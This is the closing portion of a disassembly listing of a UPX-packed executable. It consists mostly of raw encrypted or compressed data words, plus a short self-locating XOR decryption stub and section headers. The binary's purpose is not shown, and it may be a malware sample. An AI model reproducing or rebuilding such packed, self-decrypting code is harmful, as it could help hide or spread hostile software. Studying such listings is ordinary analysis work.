dd 0C57A67C0h, 2618B3h, 0CDCA0031h, 80B4A839h, 78D3C572h
dd 0E4D02006h, 0C41460F3h, 2AF1101Bh, 0A0AFD816h, 3893853Ah
dd 6BB6E0C6h, 0B81B2547h, 40706046h, 53642030h, 0F85B6507h
dd 8090A086h, 4D244070h, 13E7C7h, 0C5A4E0F0h, 6B3A3000h
dd 0CB97EB83h, 362FB0BDh, 4911CBF0h, 0D8205CF1h, 78D3E57Ah
dd 0F7BA2006h, 0F6E86B75h, 0C090A0B0h, 265C1470h, 0AD37088h
dd 0F6E86375h, 0E69A4BB0h, 4AB09FC8h, 3628A395h, 377B86F0h
dd 0B6A82B35h, 40506370h, 0F7635431h, 0F6E86B75h, 8090A0B0h
dd 0B75D1450h, 1023F7h, 70D594F0h, 737B0A20h, 0C5DBAFFBh
dd 261F98h, 885928DBh, 7759934Ch, 7668EBF5h, 80102030h
dd 4DDE95F0h, 0B6A82335h, 58EA70h, 7313D9B0h, 0DD46D08h
dd 808084F4h, 0F05880B1h, 6F38BBBh, 0E15896h, 38F60BD6h
dd 0F838E0FFh, 2102030h, 987B8611h, 0F559251Bh, 71E80676h
dd 0B0BB46F0h, 455D4A33h, 80A69828h, 78DBE587h, 102006h
dd 0C6A5F0F0h, 0D8688BE7h, 13DB799Bh, 2BE80B18h, 705D6B20h
dd 8190968Fh, 766FF0E5h, 8B292130h, 49D4C4B4h, 0B680C80Dh
dd 0D4EDEB70h, 2B10160Fh, 0F6EF7075h, 0B1557B0h, 505648h
dd 74102030h, 6B0817F2h, 0D690A472h, 88EDE327h, 10160Fh
dd 0C10964FFh, 8D78A0B0h, 0B506070h, 455E7275h, 0EEE2D3BCh
dd 80DCECF4h, 7B2AF58Fh, 85992006h, 0C0E6DF2Ch, 0BCC82BE3h
dd 33AFB873h, 3453AB18h, 3F250018h, 3C052B4Fh, 1B50564Fh
dd 891C6233h, 0F6EF0075h, 88D2A3B0h, 7FB4E5F9h, 739B2006h
dd 40631FD8h, 6890A0B0h, 0BFAF95C9h, 3FAC9DBBh, 2886E0C6h
dd 7F6F551Dh, 7FECF5FBh, 4A9B2006h, 0CC9AE3F8h, 69136E9Bh
dd 20D86F75h, 0F102031h, 0C0D1BA74h, 4025A3B0h, 4350564Fh
dd 362FA085h, 28EC4CF0h, 803225BFh, 6DD6070h, 80950B34h
dd 0C3D0D6CFh, 0EA78F0B6h, 0C3AF9F85h, 362F9C8Dh, 0CBA5E0F0h
dd 8F9CE78Bh, 40517BF3h, 391CCB30h, 0F6EF5C65h, 8D15AFB0h
dd 43506071h, 362FA0B5h, 0F85186F0h, 59F854Fh, 4050608Ch
dd 2B1260BBh, 2880D4B3h, 7F6F559Dh, 7FECDD49h, 851F2006h
dd 0C0D0E014h, 0BF5025B3h, 0C5536046h, 261FB0h, 87FBE07Bh
dd 4D12AFBCh, 7B506070h, 831F2877h, 0C0D0E034h, 83926033h
dd 0C5537437h, 261FB0h, 752FB0A2h, 80A69F6Ch, 7B6AF58Fh
dd 854A2006h, 7755EF30h, 6990A0B0h, 405060ECh, 851FDF0Ch
dd 0C0D0E064h, 8F859E30h, 4050EBF5h, 156AB30h, 90E4A3DBh
dd 7F641C58h, 0FCED598Fh, 7510160Fh, 55E387h, 8390968Fh
dd 766FE0F5h, 0E895A930h, 4BD0D6CFh, 60159BB0h, 3250564Fh
dd 0E4951B38h, 0B2D0D6CFh, 80909DD9h, 77221070h, 103FD8h
dd 3C9E6DF0h, 82BB613Bh, 7B402273h, 362FC8B5h, 43DC95F0h
dd 0B16FB074h, 5C7424FFh, 0C30BCB51h, 0FF70657Fh, 0BF0A086h
dd 766FE0C5h, 0F54AC830h, 69B11F0Fh, 90A0B0h, 77B6E05h
dd 3B19523Ch, 42DFE8B7h, 7F6F5F8Ch, 0F2D56F39h, 8BEFDFCEh
dd 6751C4CCh, 8090883Bh, 3FAF9F8Fh, 4A9162DBh, 0C0D080D4h
dd 40A3EE50h, 0C7746CFBh, 362FE8B5h, 45569F0h, 0D90968Fh
dd 4078EFC9h, 80952330h, 0A6D0D6CFh, 0ABDE0515h, 541263B6h
dd 0C61C621Bh, 7381BB6h, 8090F331h, 40506570h, 0FC56A930h
dd 9713BEAFh, 0BB16354Fh, 0A8916046h, 1A952F2Fh, 90D0E0F1h
dd 0EAB8CAE4h, 0A6C59F8Fh, 8510160Bh, 48DFBF30h, 8090A1B5h
dd 0BFB53A98h, 1C8CFh, 0A583E0F0h, 0ECF9E6C4h, 23353315h
dd 74795245h, 3FD0A189h, 0B6AFF405h, 7AC59F70h, 8910160Bh
dd 0F6EFBC75h, 808948B0h, 25036070h, 657B4164h, 0A5BE97BFh
dd 0E9F8D3C2h, 29223000h, 657C4946h, 97D08597h, 7F798B58h
dd 4043888Fh, 65432030h, 0B4A385A2h, 0D0F5D2DFh, 29260902h
dd 6577455Ch, 0CD38B7F0h, 686F5F59h, 40506062h, 61524563h
dd 0B0A58B93h, 0F6F9D2E0h, 27350C19h, 0E8472055h, 3F2F0800h
dd 8090B858h, 3353370h, 677E4158h, 0B4BFAE95h, 0D0E9C6D9h
dd 29260902h, 6577455Ch, 0D38B7F0h, 0D06F5F58h, 0D8D5ED24h
dd 6A10160Ah, 0C1BAB094h, 72055FE7h, 0C950564Bh, 95EF040Ch
dd 0C0E6DBDEh, 3D1D609Ah, 40665E20h, 0FF407060h, 0F6EA7845h
dd 8091C8B0h, 2A046074h, 95EF7731h, 0C0E6DFACh, 0D794CAE4h
dd 7F0CF58Fh, 0C4932006h, 94651FE4h, 7F90968Fh, 766B0AE5h
dd 8DD37F30h, 0F6EEB045h, 156FF6B0h, 40665B1Eh, 0FEFD8B3h
dd 0C0D05B74h, 0E01529B0h
dd 2A50564Fh, 95EF7630h, 0C0E6DB5Ah, 49F6035h, 405060D4h
dd 5040E01Bh, 0AA80E39Ah, 8090C8B1h, 0BF06A070h, 362B6AA5h
dd 3F2863F0h, 857824BFh, 0C5D96070h, 261F54h, 0FFB86D7Dh
dd 151DA086h, 40665F00h, 7A7261h, 0B6451FA0h, 390968Bh
dd 0C45F9F88h, 102586h, 752FE09Ah, 80A69FD4h, 7B22F58Fh
dd 0F8932006h, 5F54EF0Fh, 990A0B5h, 766F18F5h, 3D91330h
dd 9180B133h, 7FC1A4DAh, 766F04C5h, 4E85DF30h, 45D0D6CBh
dd 0FB14AF70h, 73506075h, 7C95A9F9h, 91D0D6CFh, 9FF8F1E1h
dd 10506F70h, 3B86B5CFh, 55E0C6h, 85A424BFh, 0C5D96070h
dd 261FB0h, 0AF3F5833h, 0CB1BA0B0h, 0CBD59748h, 101608h
dd 0B5C0E0F0h, 0E815A3B6h, 73505660h, 0F7D123E2h, 49311701h
dd 0B6AF2C35h, 68C7D870h, 4B9B2030h, 0A855E3CCh, 0B39096A0h
dd 0B79163A2h, 89F1D7C1h, 0F6EF6475h, 379F63B0h, 0A3A9663Bh
dd 1843AD05h, 0D49357FFh, 0EBD970B3h, 905348B1h, 774F1AB1h
dd 0B4298E99h, 8CEA23ADh, 0CBB01271h, 429B1C7Bh, 0D092E3E4h
dd 7FD8E43Dh, 8173B987h, 3F68A50Bh, 4B13E0C6h, 0B38084E4h
dd 0F8D2EFB0h, 0C3102030h, 0CB3B2F7Bh, 0BEC01D3Dh, 0CBAC6046h
dd 0ACD913EFh, 0C6A281CCh, 82E7DA8Ch, 7CFA405Ch, 3CFC546Ch
dd 0FC0D94DEh, 6378D5B0h, 7D51EBB9h, 557875h, 93EDEB84h
dd 8F90F2F3h, 0BFAF53F5h, 3D13ABCFh, 839EA9A7h, 7FB624BFh
dd 176D9F8Fh, 0F5E7573h, 3F2FFB74h, 0C3C79D4Fh, 0C45F5243h
dd 0FFEFDF20h, 9483B0CDh, 8514AFFFh, 73AF9F8Fh, 0FE3DC8EBh
dd 0D0A51F0Fh, 7F6C5A58h, 0BE71888Fh, 841FDFCFh, 3F2F1E1Ch
dd 96787283h, 0A8506070h, 0FFEFDF53h, 0C0D0E018h, 6D11FDB0h
dd 40665349h, 13FBD9h, 0F22F84F0h, 0BF10153Bh, 0C9346046h
dd 3E914612h, 45DFBABDh, 8090A374h, 436C3EFBh, 3B9146EEh
dd 45DFA5A0h, 8090A304h, 40462387h, 0F102010h, 0C0D34775h
dd 0DCD356B0h, 0DDD46F72h, 8B102033h, 60EDE8B3h, 8F300010h
dd 4053EFF4h, 20301D30h, 44DFC0D0h, 8090A334h, 0BFAED998h
dd 79922FCFh, 43D0E0F3h, 0B6AF6415h, 2DB6070h, 105AAB38h
dd 0C4A321DBh, 857B6083h, 0AD9A873h, 8895A920h, 0C3D0D6CFh
dd 8028ACFAh, 11506170h, 0FFF78AD8h, 4945D00Fh, 31909688h
dd 0CAE55050h, 6A101608h, 98191ED0h, 1078B4C8h, 0C5AF9F97h
dd 0C2842FE2h, 55E10223h, 80A6983Bh, 0C5A7859Bh, 2618BBh
dd 0C1D0E0F0h, 56782C4h, 406658FBh, 102033h, 6551EC85h
dd 80A6983Bh, 0BBAF9F8Fh, 8D912ADBh, 0C0E6D87Bh, 8890A0B0h
dd 40506618h, 6787930h, 98D0E0F0h, 7F77E258h, 0C3D5EA8Fh
dd 86101608h, 0F853CA74h, 518A086h, 406658F3h, 85E7C0D2h
dd 0C0E6D87Bh, 8090A0B8h, 0FDD06905h, 2618B5h, 371594F1h
dd 0B6A82B35h, 40506070h, 800B5438h, 0F6E8634Dh, 30E4A5B0h
dd 78D4DDF0h, 74152006h, 456D6057h, 85909688h, 0C5A7FE04h
dd 2618BBh, 40D0E0F0h, 3D10A9C4h, 406658F3h, 83995732h
dd 0F6EF2855h, 8778A0B0h, 0A8AF9F83h, 0FFEFDD51h, 0C0D29018h
dd 40D2BB0h, 4350564Fh, 362FA8ADh, 3CA908F0h, 49F5F4Fh
dd 40506220h, 3F9095BBh, 9E5BE0C6h, 684EA38Ch, 0BFAF9D0Ah
dd 22AA23Fh, 8A51E0F0h, 8090C094h, 12AEEB90h, 146A2366h
dd 37C09AF3h, 0B6A82B35h, 40506070h, 89045520h, 0F6EF2C4Dh
dd 18252DB0h, 0CB505648h, 360048BDh, 977413F0h, 809A8609h
dd 40E5ED70h, 0F3101620h, 23D05155h, 773453B2h, 7668EBF5h
dd 102030h, 6E54EFE0h, 7F90A0B0h, 0F6B84803h, 8BEFDFDEh
dd 0F6EF5C65h, 8F4225B0h, 4050F8F4h, 80A5AB30h, 4BD0D6CFh
dd 0CA11B0FAh, 40500054h, 85A0BD0h, 9E3E283h, 0BB84D2B3h
dd 764008FDh, 689DAB30h, 0B2D0D6E0h, 0A4AC2BE6h, 5038C5F3h
dd 83102006h, 0C0D08857h, 0FA1BA0B0h, 481A6178h, 0F797D733h
dd 0FF44657Bh, 567A086h, 406658FBh, 102070h, 0D827E284h
dd 0A99CD2B3h, 88E5E940h, 8B10160Fh, 0F0D1C883h, 0B81B2547h
dd 40106046h, 2642030h, 2881F807h, 7F6F5CF9h, 435C8B29h
dd 723B0843h, 3386B1FCh, 0DC9FF14h, 7668F8C5h, 0CCADA930h
dd 33D0D6CFh, 8FCEFF14h, 0C7DDF241h, 1020E4h, 0F85975CAh
dd 86E5A086h, 1628B219h, 50983204h, 1A6B0800h, 0BCA5F4Fh
dd 0A536C3Ah, 8B95D720h, 0C0D0D6C8h, 0D80A0B0h, 53256531h
dd 3FD8ADB9h, 45D3E0C6h, 80A6B0D8h, 4038C7F3h, 2B102030h
dd 4759C8B3h, 8090A0E3h, 7C18E587h, 112006h, 0C7A4E0F0h
dd 2098E377h, 0B7F0C0D0h, 3628ABB5h, 0C0D0E0F0h, 0D297D430h
dd 0BFA71A98h, 8D9B7ACFh, 0C0E6DF38h, 0CB19A553h, 0CB5D8B58h
dd 362FE4BDh, 2BD203F0h, 0A8DB2BB3h, 78DBE587h, 132006h
dd 0D4A4E0F0h, 0BF5C253Bh, 0CD536046h, 261F88h, 0FF6465F3h
dd 8891A086h, 0CB402AFBh, 362FA4B5h, 0C89AD9F0h, 0CA19A3C3h
dd 50126178h, 4843B3h, 0FF5C657Bh, 18F8A086h, 41506058h
dd 1492872h, 555AB0B3h, 80A69839h, 78DBE587h, 102006h
dd 0C6A4F0F0h, 90F82DB3h, 40E66046h, 389BA5C7h, 0C0D0E0C6h
dd 94E5A0B2h, 0C5A7A68Eh, 2618BBh, 0C0D4E0F0h, 351AA6C5h
dd 406658FAh, 389BA5C7h, 80D0E0C6h, 8BE5A0B0h, 825267FAh
dd 0E2C6229Ah, 4AD90B07h, 2A5292B7h, 0B7B2B672h, 8B74F203h
dd 0C25F84D2h, 0E42D23E8h, 4050564Fh, 0FACEA43Fh, 752F1F0Fh
dd 80A69F30h, 7BEAF58Fh, 0B5EF2006h, 0C0E6DF8Ch, 0BBBE354Fh
dd 0CDDD6046h, 261F58h, 0FFA0757Dh, 0D2C1A086h, 0F5AF601Ah
dd 261F54h, 0FB7E750Fh, 356FA086h, 40665F14h, 3B3EB5CFh
dd 755DE0C6h, 80A69EE0h, 7F30D58Fh, 0FF462006h, 0F6EB4A65h
dd 0E43523B0h, 4050564Fh, 10C8F3h, 0AA8DE0F0h, 167D21B1h
dd 18505647h, 85D12FC0h, 0C0E6F584h, 3536035h, 4FA09FB8h
dd 1564A5F1h, 0FD13E0C6h, 80BAA0A0h, 0C1367C05h, 6C1C044Ch
dd 0A0C39581h, 7F6F6458h, 0A855158Fh, 0FFEFDAE4h, 3F2F3218h
dd 7FBEC14Fh, 7406185Dh, 359822h, 28B0E0F0h, 7F6F5F15h
dd 4DB5905h, 0B59D1014h, 0C0E6DEA0h, 0E698F03Bh, 42565AF1h
dd 68460543h, 0C02FE0F0h, 80FA643Bh, 0D5AF3022h, 261BCAh
dd 41D82473h, 0BFAFFC8Eh, 0C353152Ch, 81F824F6h, 282F1F0Ah
dd 7F6F5FCFh, 34E8A311h, 0EB102030h, 0C0FF5841h, 9D78A0B0h
dd 82506070h, 30A82010h, 28D0E0F0h, 8090A0A0h, 0F85044B2h
dd 1021B5h, 0C0D0E318h, 80BC62B0h, 4C7434FDh, 0F8930EFDh
dd 0A0C99CF0h, 8090A058h, 6404EB70h, 1A9B7D00h, 0F8BD0D71h
dd 5478A086h, 21AF9F91h, 31024F2h, 0C2D7E6F1h, 439EE2B5h
dd 0E8181389h, 0E9h, 498D0Fh, 0C3906893h, 0C48BED01h, 0E85BD0FFh
dd 5Fh, 824648Bh, 4EBB8h, 64FAEB00h, 18A167h, 0F30408Bh
dd 830240B6h, 427500F8h, 0E8h, 0ED815D00h, 402338h, 2385858Bh
dd 85030040h, 40238Dh, 858BF08Bh, 402389h, 238D8503h, 60500040h
dd 0C933FE8Bh, 2395958Ah, 32AC0040h, 0AAD002C2h, 918D3B41h
dd 7C004023h, 2BC361F1h, 30FF64C0h, 0B8208964h, 12345678h
dd 60000387h, 7C800000h, 0
dd 1E003143h, 300000h, 1AAh dup(0)
dd offset loc_3143A000
dd 100Bh dup(0)
UPX2 ends
; Section 4. (virtual address 00011000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00011000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31441000h
align 2000h
_idata2 ends
end start